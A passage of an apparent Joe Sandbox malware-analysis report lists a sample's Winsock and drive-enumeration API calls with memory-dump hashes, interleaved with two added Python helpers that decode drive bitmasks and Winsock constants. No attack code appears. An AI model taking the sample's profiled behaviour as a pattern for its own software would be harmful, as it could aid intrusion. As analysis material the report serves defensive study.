                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: Startup
                                                        • String ID: if_nametoindex$iphlpapi.dll
                                                        • API String ID: 724789610-3097795196
                                                        • Opcode ID: becc2da6df6210129f1befc57d4c18f54644d715835a36845c6f79d3c34836bb
                                                        • Instruction ID: 61ea48ee72e3839294c16bca7112e7bb962ebf6b16e721b72b62ea1410b1b1eb
                                                        • Opcode Fuzzy Hash: becc2da6df6210129f1befc57d4c18f54644d715835a36845c6f79d3c34836bb
                                                        • Instruction Fuzzy Hash: D9012690E8438117EB217B3CED1B36725E05B56708F84186AE848963D6FB3DC989C2A7
                                                        APIs
                                                        • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0051AB9B
                                                        • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0051ABE4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: ioctlsocketsocket
                                                        • String ID:
                                                        • API String ID: 416004797-0
                                                        • Opcode ID: fbb30cf27391800e1b34a16f456e00dd661c4fedf85fa87ba5d7146879002b90
                                                        • Instruction ID: b917917152af15fb369918e85340a240081759504651cd0c1ec61758cda191f3
                                                        • Opcode Fuzzy Hash: fbb30cf27391800e1b34a16f456e00dd661c4fedf85fa87ba5d7146879002b90
                                                        • Instruction Fuzzy Hash: EEE1F2706053429BFB21CF24C885BAB7BE5FF85314F044A2DF9988B291E775D984CB92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 8f876e37ca3e87e43e1221ac7b530a902baca5aee31a099edb1b51e70764c1f2
                                                        • Instruction ID: 023f33a6070ff4840f902f7392f8cbe7aab68aeb9695774ec5334d20b32d532a
                                                        • Opcode Fuzzy Hash: 8f876e37ca3e87e43e1221ac7b530a902baca5aee31a099edb1b51e70764c1f2
                                                        • Instruction Fuzzy Hash: 8A41E6FB22C111BE722A81552B659FB676DE5CF730B328937F403D69C2E3984A8D5032
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 9416cf7c5c8d1ecaf6eaa1d34bf2153f50eb2462fae42c64003d32c78beb6915
                                                        • Instruction ID: 639e08a64b37c244df0de7c8e31483dc4ffb966eb4fcc34a504ea0a0a69b463a
                                                        • Opcode Fuzzy Hash: 9416cf7c5c8d1ecaf6eaa1d34bf2153f50eb2462fae42c64003d32c78beb6915
                                                        • Instruction Fuzzy Hash: 7F41F8F722C111FD722A85552B549FB676DE5CF730B328577F803D6981E3984A8D5032
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 071B0456
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 0e69513b3e4042112912b7b33152124596bfba44063e6b7319be1930b68ea081
                                                        • Instruction ID: 9a82125e35ac71a09a853164140da7aa05f087a0e8d14829c8eff97b23eec08c
                                                        • Opcode Fuzzy Hash: 0e69513b3e4042112912b7b33152124596bfba44063e6b7319be1930b68ea081
                                                        • Instruction Fuzzy Hash: 7741E6F722C111BD722A85562BA59FB676DE5CF730B328977F403C6A81E3984E8D5032
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 63095e0af155b2392165d95f18a0b0722c186d019884c640b1c2a3e1472cb14f
                                                        • Instruction ID: 1fab2dbf10e3551ae689198ba807c5c7670c88e15019b30eab70dd8b8cea53d2
                                                        • Opcode Fuzzy Hash: 63095e0af155b2392165d95f18a0b0722c186d019884c640b1c2a3e1472cb14f
                                                        • Instruction Fuzzy Hash: C33126FB22C111BD722A81552BA45FB676DE5CF730B328977F403C6AC1E3984A895032
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 071B0456
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 21f2a0f2b0a86c37fae04142b757921c47dd8c6a4e153ab874e7695ed9010378
                                                        • Instruction ID: fbd65dda52adc20d8ece432eafce41ecea050d060c66f229613d6fb68078d633
                                                        • Opcode Fuzzy Hash: 21f2a0f2b0a86c37fae04142b757921c47dd8c6a4e153ab874e7695ed9010378
                                                        • Instruction Fuzzy Hash: B33128F722C111AD722985552BA05FB576DE6CF370F33896AF403C2AC1E3944E895032
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 071B0456
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1514555451.00000000071B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_71b0000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID: A:\
                                                        • API String ID: 999431828-3379428675
                                                        • Opcode ID: 0e1ddbe7863af54990a07fe3b20426d0c8dd18148aef637c6c9565e35c0e764a
                                                        • Instruction ID: dc18da937285b01c0b891ec4608eb054c39a5e3dc8b565ffd747d2ca32fa4953
                                                        • Opcode Fuzzy Hash: 0e1ddbe7863af54990a07fe3b20426d0c8dd18148aef637c6c9565e35c0e764a
                                                        • Instruction Fuzzy Hash: D231E4E722C111ED722A85552BA05FB576DE5CF730B338566F803D6AC1E3984B895032
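Every DrivesLogical entry above pairs GetLogicalDrives with a single "A:\" literal, which is consistent with code that walks the returned bitmask and bumps the drive letter of one template string for each set bit rather than storing 26 separate roots. The following is an added example, not code from the report or from the sample, that reproduces that decoding offline so a captured return value can be turned into the drive roots the code would have visited; the function names and the sample masks are constructed for illustration.

```python
# Added example: decode a GetLogicalDrives() bitmask into drive roots.
# Constructed helper for reading the report entries above; not code from the
# sample or from Joe Sandbox. Function names and sample masks are illustrative.
from typing import Iterable, List

DRIVE_TEMPLATE = "A:\\"   # the single root literal that sits next to GetLogicalDrives
MAX_DRIVES = 26           # bits 0..25 of the returned DWORD map to A: .. Z:


def drive_roots(mask: int) -> List[str]:
    """Return the root path for every set bit in a GetLogicalDrives mask.

    Bit 0 is A:, bit 1 is B:, ..., bit 25 is Z:. Bits above 25 are ignored,
    which matches what the API documents for its return value.
    """
    roots = []
    for bit in range(MAX_DRIVES):
        if mask & (1 << bit):
            # One template, letter incremented per bit: the pattern the
            # listing implies with its lone "A:\" string.
            roots.append(chr(ord(DRIVE_TEMPLATE[0]) + bit) + DRIVE_TEMPLATE[1:])
    return roots


def drive_mask(roots: Iterable[str]) -> int:
    """Inverse of drive_roots(), handy for building expected-value checks."""
    mask = 0
    for root in roots:
        letter = root[:1].upper()
        if not ("A" <= letter <= "Z"):
            raise ValueError(f"not a drive root: {root!r}")
        mask |= 1 << (ord(letter) - ord("A"))
    return mask


if __name__ == "__main__":
    # Constructed sample: C: and D: present, as on a single-disk VM with an optical drive.
    sample_mask = 0x0000000C
    print(drive_roots(sample_mask))   # ['C:\\', 'D:\\']
```

The mask is only 26 meaningful bits wide, so a value with bit 26 or higher set is not a valid GetLogicalDrives result; drive_roots() simply ignores those bits rather than inventing drive letters past Z:.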
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: closesocket
                                                        • String ID: FD %s:%d sclose(%d)
                                                        • API String ID: 2781271927-3116021458
                                                        • Opcode ID: 0f8a2118b6adf39e5c33f7d8012a886f93e8aea86e83cf02f1dcae4bf1bc0e20
                                                        • Instruction ID: 19a1c6f26075e096aa1c438618c2e3e23f6359334facecf19c92f476ad6d90c8
                                                        • Opcode Fuzzy Hash: 0f8a2118b6adf39e5c33f7d8012a886f93e8aea86e83cf02f1dcae4bf1bc0e20
                                                        • Instruction Fuzzy Hash: 61D05E329192313B852069997C49C4B7BA8DDC6F61F064CADFD4067205D2209D0487E2
                                                        APIs
                                                        • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0051B29E,?,00000000,?,?), ref: 0051B0BA
                                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00503C41,00000000), ref: 0051B0C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                        • Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastconnect
                                                        • String ID:
                                                        • API String ID: 374722065-0
                                                        • Opcode ID: a2be62084570a709f5b69b76195bff6e4f985fafbdc377df36b86ad4d4c0f579
                                                        • Instruction ID: 480315afb0c158adbb34df1a2f3942a6cf1a4b74aecb400980cbcdc5baf2af67
                                                        • Opcode Fuzzy Hash: a2be62084570a709f5b69b76195bff6e4f985fafbdc377df36b86ad4d4c0f579
                                                        • Instruction Fuzzy Hash: 9101DD356042009BFA205A658C88EE7B795FF8D364F040B58F578531D1D726DD904751
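The socket entries above carry several raw constants: ioctlsocket is called with 8004667E, WSAStartup with 00000202, and connect is immediately followed by WSAGetLastError. The following is an added example, not code from the report or from the sample, that decodes those values offline: the Winsock _IOW/_IOR bit layout turns 8004667E into FIONBIO (non-blocking mode), 0202 into Winsock version 2.2, and a table of the documented WSAE* codes interprets the value read after connect, where WSAEWOULDBLOCK on a socket that was first switched to non-blocking is the normal in-progress result rather than a failure. The function names are constructed for illustration; the constants and error codes are the documented Winsock values.

```python
# Added example: decode the raw Winsock constants from the listing above.
# Constructed helper; not code from the sample or from Joe Sandbox. The
# ioctl bit layout and the WSAE* values are the documented Winsock definitions.
from typing import NamedTuple, Tuple

# Bit layout of Winsock ioctl request codes (the _IO/_IOR/_IOW macros).
IOC_VOID = 0x20000000      # no parameters
IOC_OUT = 0x40000000       # parameters copied out (_IOR)
IOC_IN = 0x80000000        # parameters copied in (_IOW)
IOCPARM_MASK = 0x7F        # the size field is 7 bits wide


class IoctlCode(NamedTuple):
    direction: str   # "in", "out", "inout" or "void"
    size: int        # sizeof(argument), 0..127
    group: str       # the 'x' letter in _IOW(x, y, t), 'f' for the FIO* family
    number: int      # the 'y' ordinal


def _iow(group: str, number: int, size: int) -> int:
    return IOC_IN | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | number


def _ior(group: str, number: int, size: int) -> int:
    return IOC_OUT | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | number


# The socket ioctls Winsock defines through those macros (u_long argument, 4 bytes).
KNOWN_IOCTLS = {
    _iow("f", 126, 4): "FIONBIO",     # 0x8004667E: set/clear non-blocking mode
    _ior("f", 127, 4): "FIONREAD",    # 0x4004667F: bytes readable without blocking
    _ior("s", 7, 4): "SIOCATMARK",    # 0x40047307: positioned at the OOB mark?
}


def decode_ioctl(code: int) -> IoctlCode:
    """Split a 32-bit ioctl request code into its direction/size/group/number fields."""
    code &= 0xFFFFFFFF
    copy_in, copy_out = bool(code & IOC_IN), bool(code & IOC_OUT)
    if copy_in and copy_out:
        direction = "inout"
    elif copy_in:
        direction = "in"
    elif copy_out:
        direction = "out"
    else:
        direction = "void"
    size = (code >> 16) & IOCPARM_MASK
    group = chr((code >> 8) & 0xFF)
    number = code & 0xFF
    return IoctlCode(direction, size, group, number)


def name_ioctl(code: int) -> str:
    """Symbolic name for a request code, or "unknown" if it is not a Winsock socket ioctl."""
    return KNOWN_IOCTLS.get(code & 0xFFFFFFFF, "unknown")


def wsa_version(word: int) -> Tuple[int, int]:
    """WSAStartup takes MAKEWORD(major, minor): low byte major, high byte minor."""
    return (word & 0xFF, (word >> 8) & 0xFF)


# Documented Winsock error codes that connect() commonly produces.
WSA_CONNECT_ERRORS = {
    10035: "WSAEWOULDBLOCK",
    10036: "WSAEINPROGRESS",
    10037: "WSAEALREADY",
    10051: "WSAENETUNREACH",
    10056: "WSAEISCONN",
    10060: "WSAETIMEDOUT",
    10061: "WSAECONNREFUSED",
    10065: "WSAEHOSTUNREACH",
}


def classify_connect_error(err: int) -> str:
    """Interpret WSAGetLastError() taken right after connect() on a FIONBIO=1 socket.

    On a non-blocking socket connect() returns SOCKET_ERROR immediately;
    WSAEWOULDBLOCK then means the handshake is still in flight, not a failure.
    """
    name = WSA_CONNECT_ERRORS.get(err, "unknown")
    if err == 10035:
        return f"{name}: connect in progress (normal for a non-blocking socket)"
    if err == 10056:
        return f"{name}: socket already connected"
    return f"{name}: connect failed ({err})"


if __name__ == "__main__":
    # Values exactly as rendered in the listing: ioctlsocket(..., 8004667E, 1), WSAStartup(00000202).
    print(name_ioctl(0x8004667E), decode_ioctl(0x8004667E))
    print(wsa_version(0x0202))
```

The third ioctlsocket argument in the listing is 00000001, i.e. FIONBIO with a non-zero value, which enables non-blocking mode; the same request code with 0 would switch the socket back to blocking, so the value matters as much as the code when reading a trace.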
APIs
• gethostname.WS2_32(00000000,00000040), ref: 00504AA4
Memory Dump Source
• Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
Similarity
• API ID: gethostname
• String ID:
• API String ID: 144339138-0
• Opcode ID: ffa2c842f42a29ccd441f35887621a88c763069d5b5d9e7222b0b7b27775cf6d
• Instruction ID: 161d125c369d3fefa4f290ac99b7d23939a1bb86ea0c2f082044e602cfcd55bf
• Opcode Fuzzy Hash: ffa2c842f42a29ccd441f35887621a88c763069d5b5d9e7222b0b7b27775cf6d
• Instruction Fuzzy Hash: E551CEF06047009BEB309B69DE4972B7AE4BF45319F14093CEA8A866E1E774E844CF12
APIs
• getsockname.WS2_32(?,?,00000080), ref: 0051AFD1
Memory Dump Source
• Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
Similarity
• API ID: getsockname
• String ID:
• API String ID: 3358416759-0
• Opcode ID: 1bf5d981ab41217f18df95ecf0209de6ad4f35f53ae087fd55ede6b6a078e12c
• Instruction ID: f68ca60419587c0d3464679b5ef9660aa56cdeb288609c494a31ec1e4ca2d4dd
• Opcode Fuzzy Hash: 1bf5d981ab41217f18df95ecf0209de6ad4f35f53ae087fd55ede6b6a078e12c
• Instruction Fuzzy Hash: 3F11667080878595FB268F18D4067F6B7F4FFD4329F109A19E59942150F7729AC68BC2
APIs
• send.WS2_32(?,?,?,00000000,00000000,?), ref: 0051A97E
Memory Dump Source
• Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511898886.0000000001070000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511918706.0000000001071000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511935370.0000000001072000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_EwhnoHx0n5.jbxd
Similarity
• API ID: send
• String ID:
• API String ID: 2809346765-0
• Opcode ID: 259cb4a37b22c08e253f0202dd0a4ee49fceec04afb8f6f9fe172e21a046b1a2
• Instruction ID: ef95a8ae87689a2e46c8e47526655e47ac6a286b1fe6c878e6fd5f1a5da81079
• Opcode Fuzzy Hash: 259cb4a37b22c08e253f0202dd0a4ee49fceec04afb8f6f9fe172e21a046b1a2
• Instruction Fuzzy Hash: 0B01A272B01710AFD6158F25DC45B9ABBA5FFC4720F068659EA982B361C331AC508BD1
APIs
• socket.WS2_32(?,0051B280,00000000,-00000001,00000000,0051B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0051AF67
Memory Dump Source
• Source File: 00000000.00000002.1510829214.0000000000451000.00000040.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1510808132.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B27000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1510829214.0000000000B29000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511339286.0000000000B2C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000B2E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000CB0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EA3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511357906.0000000000EBB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511717121.0000000000EBC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511858435.000000000106F000.00000040.00000001.01000000.00000003.sdmp
